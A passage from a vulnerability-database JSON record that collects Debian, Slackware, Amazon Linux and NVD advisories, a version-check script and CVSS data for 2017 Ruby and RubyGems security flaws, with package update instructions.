The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2017-0898\naerodudrizzt reported a buffer underrun vulnerability in the sprintf\nmethod of the Kernel module resulting in heap memory corruption or\ninformation disclosure from the heap.\n\nCVE-2017-0903\nMax Justicz reported that RubyGems is prone to an unsafe object\ndeserialization vulnerability. When parsed by an application which\nprocesses gems, a specially crafted YAML formatted gem specification\ncan lead to remote code execution.\n\nCVE-2017-10784\nYusuke Endoh discovered an escape sequence injection vulnerability\nin the Basic authentication of WEBrick. An attacker can take\nadvantage of this flaw to inject malicious escape sequences to the\nWEBrick log and potentially execute control characters on the\nvictim's terminal emulator when reading logs.\n\nCVE-2017-14033\nasac reported a buffer underrun vulnerability in the OpenSSL\nextension. A remote attacker can take advantage of this flaw to\ncause the Ruby interpreter to crash leading to a denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby2.3-dev\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby2.3-doc\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby2.3-tcltk\", ver:\"2.3.3-1+deb9u2\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 
9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "description": "New ruby packages are available for Slackware 14.2 and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/ruby-2.2.8-i586-1_slack14.2.txz: Upgraded.\n This release includes several security fixes.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0898\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0899\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0900\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0901\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0902\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10784\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14033\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14064\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ruby-2.2.8-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ruby-2.2.8-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/ruby-2.4.2-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/ruby-2.4.2-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.2 package:\n2075dcd60f69c74746bbafa2815bfaf3 ruby-2.2.8-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n32c1da6bf7c4fcd43bad4c0f8bbba9f4 ruby-2.2.8-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n989ad7b1339640d49d7bae34adae727a d/ruby-2.4.2-i586-1.txz\n\nSlackware x86_64 -current package:\nb19b4191baf1c0e340a1f1d5c4034b4c d/ruby-2.4.2-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ruby-2.2.8-i586-1_slack14.2.txz", "modified": "2017-09-18T19:20:47", "published": "2017-09-18T19:20:47", "id": "SSA-2017-261-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.371069", "type": "slackware", "title": "[slackware-security] ruby", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:13", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "description": "**Issue Overview:**\n\nArbitrary heap exposure during a JSON.generate call \nRuby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. 
The issues lies in using strdup in ext/json/ext/generator/generator.c, which will stop after encountering a '\\\\\\0' byte, returning a pointer to a string of length zero, which is not the length stored in space_len. ([CVE-2017-14064 __](<https://access.redhat.com/security/cve/CVE-2017-14064>))\n\nEscape sequence injection vulnerability in the Basic authentication of WEBrick \nThe Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name. ([CVE-2017-10784 __](<https://access.redhat.com/security/cve/CVE-2017-10784>))\n\nBuffer underrun in OpenSSL ASN1 decode \nThe decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service (interpreter crash) via a crafted string. ([CVE-2017-14033 __](<https://access.redhat.com/security/cve/CVE-2017-14033>))\n\nNo size limit in summary length of gem spec \nRubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications to cause a denial of service attack against RubyGems clients who have issued a `query` command. ([CVE-2017-0900 __](<https://access.redhat.com/security/cve/CVE-2017-0900>))\n\nArbitrary file overwrite due to incorrect validation of specification name \nRubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem. ([CVE-2017-0901 __](<https://access.redhat.com/security/cve/CVE-2017-0901>))\n\nDNS hijacking vulnerability \nRubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking vulnerability that allows a MITM attacker to force the RubyGems client to download and install gems from a server that the attacker controls. 
([CVE-2017-0902 __](<https://access.redhat.com/security/cve/CVE-2017-0902>))\n\nBuffer underrun vulnerability in Kernel.sprintf \nRuby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string which contains a precious specifier (*) with a huge minus value. Such situation can lead to a buffer overrun, resulting in a heap memory corruption or an information disclosure from the heap. ([CVE-2017-0898 __](<https://access.redhat.com/security/cve/CVE-2017-0898>))\n\nEscape sequence in the \"summary\" field of gemspec \nRubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences. ([CVE-2017-0899 __](<https://access.redhat.com/security/cve/CVE-2017-0899>))\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. ([CVE-2017-0903 __](<https://access.redhat.com/security/cve/CVE-2017-0903>))\n\n \n**Affected Packages:** \n\n\nruby24\n\n \n**Issue Correction:** \nRun _yum update ruby24_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n rubygem24-bigdecimal-1.3.0-1.30.4.amzn1.i686 \n rubygem24-io-console-0.4.6-1.30.4.amzn1.i686 \n ruby24-devel-2.4.2-1.30.4.amzn1.i686 \n rubygem24-json-2.0.4-1.30.4.amzn1.i686 \n rubygem24-xmlrpc-0.2.1-1.30.4.amzn1.i686 \n rubygem24-psych-2.2.2-1.30.4.amzn1.i686 \n ruby24-debuginfo-2.4.2-1.30.4.amzn1.i686 \n ruby24-2.4.2-1.30.4.amzn1.i686 \n ruby24-libs-2.4.2-1.30.4.amzn1.i686 \n \n noarch: \n rubygem24-did_you_mean-1.1.0-1.30.4.amzn1.noarch \n rubygems24-2.6.13-1.30.4.amzn1.noarch \n rubygems24-devel-2.6.13-1.30.4.amzn1.noarch \n ruby24-irb-2.4.2-1.30.4.amzn1.noarch \n ruby24-doc-2.4.2-1.30.4.amzn1.noarch \n \n src: \n ruby24-2.4.2-1.30.4.amzn1.src \n \n x86_64: \n ruby24-devel-2.4.2-1.30.4.amzn1.x86_64 \n rubygem24-xmlrpc-0.2.1-1.30.4.amzn1.x86_64 \n rubygem24-json-2.0.4-1.30.4.amzn1.x86_64 \n rubygem24-bigdecimal-1.3.0-1.30.4.amzn1.x86_64 \n ruby24-2.4.2-1.30.4.amzn1.x86_64 \n ruby24-debuginfo-2.4.2-1.30.4.amzn1.x86_64 \n rubygem24-io-console-0.4.6-1.30.4.amzn1.x86_64 \n ruby24-libs-2.4.2-1.30.4.amzn1.x86_64 \n rubygem24-psych-2.2.2-1.30.4.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-10-26T17:01:00", "published": "2017-10-26T17:01:00", "id": "ALAS-2017-915", "href": "https://alas.aws.amazon.com/ALAS-2017-915.html", "title": "Medium: ruby24", "type": "amazon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:34:56", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2015-9096", "CVE-2017-14064", "CVE-2017-0901"], "description": "**Issue Overview:**\n\nSMTP command injection via CRLF sequences in RCPT TO or MAIL FROM commands in Net::SMTP \nA SMTP command injection flaw was found in the way Ruby's Net::SMTP module handled CRLF sequences in certain SMTP commands. 
An attacker could potentially use this flaw to inject SMTP commands in a SMTP session in order to facilitate phishing attacks or spam campaigns. ([CVE-2015-9096 __](<https://access.redhat.com/security/cve/CVE-2015-9096>))\n\nEscape sequence injection vulnerability in the Basic authentication of WEBrick \nThe Basic authentication code in WEBrick library in Ruby allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name. ([CVE-2017-10784 __](<https://access.redhat.com/security/cve/CVE-2017-10784>))\n\nBuffer underrun in OpenSSL ASN1 decode \nThe decode method in the OpenSSL::ASN1 module in Ruby allows attackers to cause a denial of service (interpreter crash) via a crafted string. ([CVE-2017-14033 __](<https://access.redhat.com/security/cve/CVE-2017-14033>))\n\nNo size limit in summary length of gem spec \nRubyGems is vulnerable to maliciously crafted gem specifications to cause a denial of service attack against RubyGems clients who have issued a `query` command. ([CVE-2017-0900 __](<https://access.redhat.com/security/cve/CVE-2017-0900>))\n\nArbitrary file overwrite due to incorrect validation of specification name \nRubyGems fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem. ([CVE-2017-0901 __](<https://access.redhat.com/security/cve/CVE-2017-0901>))\n\nDNS hijacking vulnerability \nRubyGems is vulnerable to a DNS hijacking vulnerability that allows a MITM attacker to force the RubyGems client to download and install gems from a server that the attacker controls. ([CVE-2017-0902 __](<https://access.redhat.com/security/cve/CVE-2017-0902>))\n\nBuffer underrun vulnerability in Kernel.sprintf \nRuby is vulnerable to a malicious format string which contains a precious specifier (*) with a huge minus value. 
Such situation can lead to a buffer overrun, resulting in a heap memory corruption or an information disclosure from the heap. ([CVE-2017-0898 __](<https://access.redhat.com/security/cve/CVE-2017-0898>))\n\nEscape sequence in the \"summary\" field of gemspec \nRubyGems is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences. ([CVE-2017-0899 __](<https://access.redhat.com/security/cve/CVE-2017-0899>))\n\nArbitrary heap exposure during a JSON.generate call \nRuby can expose arbitrary memory during a JSON.generate call. The issues lies in using strdup in ext/json/ext/generator/generator.c, which will stop after encountering a '\\\\\\0' byte, returning a pointer to a string of length zero, which is not the length stored in space_len. ([CVE-2017-14064 __](<https://access.redhat.com/security/cve/CVE-2017-14064>))\n\nA vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. ([CVE-2017-0903 __](<https://access.redhat.com/security/cve/CVE-2017-0903>))\n\n \n**Affected Packages:** \n\n\nruby22, ruby23\n\n \n**Issue Correction:** \nRun _yum update ruby22_ to update your system. \nRun _yum update ruby23_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ruby22-libs-2.2.8-1.9.amzn1.i686 \n rubygem22-psych-2.0.8.1-1.9.amzn1.i686 \n ruby22-debuginfo-2.2.8-1.9.amzn1.i686 \n ruby22-2.2.8-1.9.amzn1.i686 \n ruby22-devel-2.2.8-1.9.amzn1.i686 \n rubygem22-io-console-0.4.3-1.9.amzn1.i686 \n rubygem22-bigdecimal-1.2.6-1.9.amzn1.i686 \n rubygem23-psych-2.1.0.1-1.17.amzn1.i686 \n rubygem23-io-console-0.4.5-1.17.amzn1.i686 \n rubygem23-json-1.8.3.1-1.17.amzn1.i686 \n ruby23-devel-2.3.5-1.17.amzn1.i686 \n ruby23-debuginfo-2.3.5-1.17.amzn1.i686 \n ruby23-2.3.5-1.17.amzn1.i686 \n rubygem23-bigdecimal-1.2.8-1.17.amzn1.i686 \n ruby23-libs-2.3.5-1.17.amzn1.i686 \n \n noarch: \n ruby22-irb-2.2.8-1.9.amzn1.noarch \n rubygems22-devel-2.4.5.2-1.9.amzn1.noarch \n rubygems22-2.4.5.2-1.9.amzn1.noarch \n ruby22-doc-2.2.8-1.9.amzn1.noarch \n ruby23-doc-2.3.5-1.17.amzn1.noarch \n rubygem23-did_you_mean-1.0.0-1.17.amzn1.noarch \n rubygems23-devel-2.5.2.1-1.17.amzn1.noarch \n rubygems23-2.5.2.1-1.17.amzn1.noarch \n ruby23-irb-2.3.5-1.17.amzn1.noarch \n \n src: \n ruby22-2.2.8-1.9.amzn1.src \n ruby23-2.3.5-1.17.amzn1.src \n \n x86_64: \n ruby22-2.2.8-1.9.amzn1.x86_64 \n ruby22-devel-2.2.8-1.9.amzn1.x86_64 \n ruby22-debuginfo-2.2.8-1.9.amzn1.x86_64 \n rubygem22-bigdecimal-1.2.6-1.9.amzn1.x86_64 \n ruby22-libs-2.2.8-1.9.amzn1.x86_64 \n rubygem22-psych-2.0.8.1-1.9.amzn1.x86_64 \n rubygem22-io-console-0.4.3-1.9.amzn1.x86_64 \n rubygem23-json-1.8.3.1-1.17.amzn1.x86_64 \n ruby23-debuginfo-2.3.5-1.17.amzn1.x86_64 \n rubygem23-psych-2.1.0.1-1.17.amzn1.x86_64 \n ruby23-libs-2.3.5-1.17.amzn1.x86_64 \n ruby23-2.3.5-1.17.amzn1.x86_64 \n rubygem23-bigdecimal-1.2.8-1.17.amzn1.x86_64 \n rubygem23-io-console-0.4.5-1.17.amzn1.x86_64 \n ruby23-devel-2.3.5-1.17.amzn1.x86_64 \n \n \n", "edition": 6, "modified": "2017-10-02T17:01:00", "published": "2017-10-02T17:01:00", "id": "ALAS-2017-906", "href": "https://alas.aws.amazon.com/ALAS-2017-906.html", "title": "Medium: ruby22, ruby23", "type": "amazon", "cvss": {"score": 
9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:36:32", "description": "The Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-19T17:29:00", "title": "CVE-2017-10784", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10784"], "modified": "2018-10-31T10:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.4.1", "cpe:/a:ruby-lang:ruby:2.3.1", "cpe:/a:ruby-lang:ruby:2.4.0", "cpe:/a:ruby-lang:ruby:2.3.4", "cpe:/a:ruby-lang:ruby:2.3.2", "cpe:/a:ruby-lang:ruby:2.2.7", "cpe:/a:ruby-lang:ruby:2.3.3"], "id": "CVE-2017-10784", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10784", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.4.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:ruby-lang:ruby:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview1:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:36", "description": "Ruby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. The issues lies in using strdup in ext/json/ext/generator/generator.c, which will stop after encountering a '\\0' byte, returning a pointer to a string of length zero, which is not the length stored in space_len.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-31T17:29:00", "title": "CVE-2017-14064", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14064"], "modified": "2019-05-13T18:48:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.4.1", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/a:ruby-lang:ruby:2.3.1", "cpe:/a:ruby-lang:ruby:2.4.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:ruby-lang:ruby:2.3.4", "cpe:/a:ruby-lang:ruby:2.3.2", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:ruby-lang:ruby:2.2.7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:ruby-lang:ruby:2.3.3", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-14064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14064", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview2:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview1:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview1:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:36:36", "description": "The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service (interpreter crash) via a crafted string.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-19T17:29:00", "title": "CVE-2017-14033", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", 
"integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14033"], "modified": "2018-10-31T10:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.4.1", "cpe:/a:ruby-lang:ruby:2.2.5", "cpe:/a:ruby-lang:ruby:2.3.1", "cpe:/a:ruby-lang:ruby:2.4.0", "cpe:/a:ruby-lang:ruby:2.2.3", "cpe:/a:ruby-lang:ruby:2.3.4", "cpe:/a:ruby-lang:ruby:2.3.2", "cpe:/a:ruby-lang:ruby:2.2.1", "cpe:/a:ruby-lang:ruby:2.2.4", "cpe:/a:ruby-lang:ruby:2.2.0", "cpe:/a:ruby-lang:ruby:2.2.7", "cpe:/a:ruby-lang:ruby:2.2.2", "cpe:/a:ruby-lang:ruby:2.2.6", "cpe:/a:ruby-lang:ruby:2.3.3"], "id": "CVE-2017-14033", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14033", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:preview1:*:*:*:*:*:*", 
